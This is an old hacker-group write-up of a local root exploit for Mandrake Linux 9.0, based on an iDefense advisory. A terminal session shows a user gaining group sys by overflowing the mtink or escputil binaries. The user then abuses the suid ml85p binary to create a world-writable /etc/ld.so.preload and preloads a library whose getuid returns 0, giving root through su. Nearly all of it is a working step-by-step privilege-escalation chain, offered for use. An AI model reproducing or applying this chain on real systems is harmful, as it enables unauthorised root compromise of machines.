------------------------------------------------------------------------------------------------------------------
 Priv8security.com -  Mandrake 9.0 local root exploit

 Based on Idefense adv. http://www.idefense.com/advisory/01.21.03.txt
 
 Greets to : coideloko, chroot-, xtc , M|ght, exitus, overkill, blood_sucker, lkm, Brother
execk, printf, heap, diguin, n4rfy(nordico :ppp) and all friends of Priv8 security.

OBS. My english sux...
------------------------------------------------------------------------------------------------------------------

 Ok, our goal is to get root by exploiting ml85p thats suid root by default on mdk 9.0

[wsxz@localhost priv8]$ ls -l /usr/bin/ml85p
-rwsr-x---    1 root     sys         12344 Set 17 16:40 /usr/bin/ml85p*

 You can see that we gona need group sys to run it so first lets get it. 
 
[wsxz@localhost priv8]$ ls -l /usr/bin/mtink
-rwxr-sr-x    1 lp       sys        132600 Set 17 16:40 /usr/bin/mtink*
[wsxz@localhost priv8]$ ls -l /usr/bin/escputil
-rwxr-sr-x    1 lp       sys         32088 Set 17 16:40 /usr/bin/escputil*

 We have two here that are vuln, mtink has a stack overflow on env HOME and escputil
has a stack over too on command line arg, for more details read idefense adv.

So here we go....
First we get gid sys by exploiting mtink or escputil, u can choose what one u want to.

[wsxz@localhost priv8]$ id
uid=503(wsxz) gid=503(wsxz) grupos=503(wsxz)
[wsxz@localhost priv8]$ perl priv8mtink.pl
 Priv8security.com Mandrake 9 mtink local sys exploit!!
 usage: priv8mtink.pl offset
 Using address: 0xbffffa80
sh-2.05b$ id
uid=503(wsxz) gid=3(sys) groups=503(wsxz)

And now we can exploit ml85p

1 - Writing any file on system!!!

sh-2.05b$ perl priv8ml85p.pl /root/hi-there-Mr-root
Let write some files ok ;p
Now just press enter ;)
Wrong file format.
file position: ffffffff
sh-2.05b$

Now we check if it worked....

[root@localhost root]# pwd
/root
[root@localhost root]# ls -l hi*
-rw-rw-rw-    1 root     sys             0 Fev 24 03:32 hi-there-Mr-root

2 - Geting root with it ;)

I will do the same thing on idefense adv, so lets do it..

sh-2.05b$ id
uid=503(wsxz) gid=3(sys) groups=503(wsxz)
sh-2.05b$ perl priv8ml85p.pl /etc/ld.so.preload
Let write some files ok ;p
Now just press enter ;)
Wrong file format.
file position: ffffffff
sh-2.05b$ ls -l /etc/ld.so.preload
-rw-rw-rw-    1 root     sys             0 Feb 26 00:12 /etc/ld.so.preload
sh-2.05b$ cd /tmp
sh-2.05b$ echo 'int getuid(void) { return 0; }' > lib.c
sh-2.05b$ export PATH="/usr/bin:/usr/sbin:/sbin:/bin"
sh-2.05b$ gcc -fPIC -c /tmp/lib.c
sh-2.05b$ gcc -o /tmp/lib.so -shared /tmp/lib.o
sh-2.05b$ echo "/tmp/lib.so" > /etc/ld.so.preload
sh-2.05b$ su -
[root@localhost root]# id
uid=0(root) gid=0(root) grupos=0(root)

It worked, so take care what u ll write ok ;)
that's it.

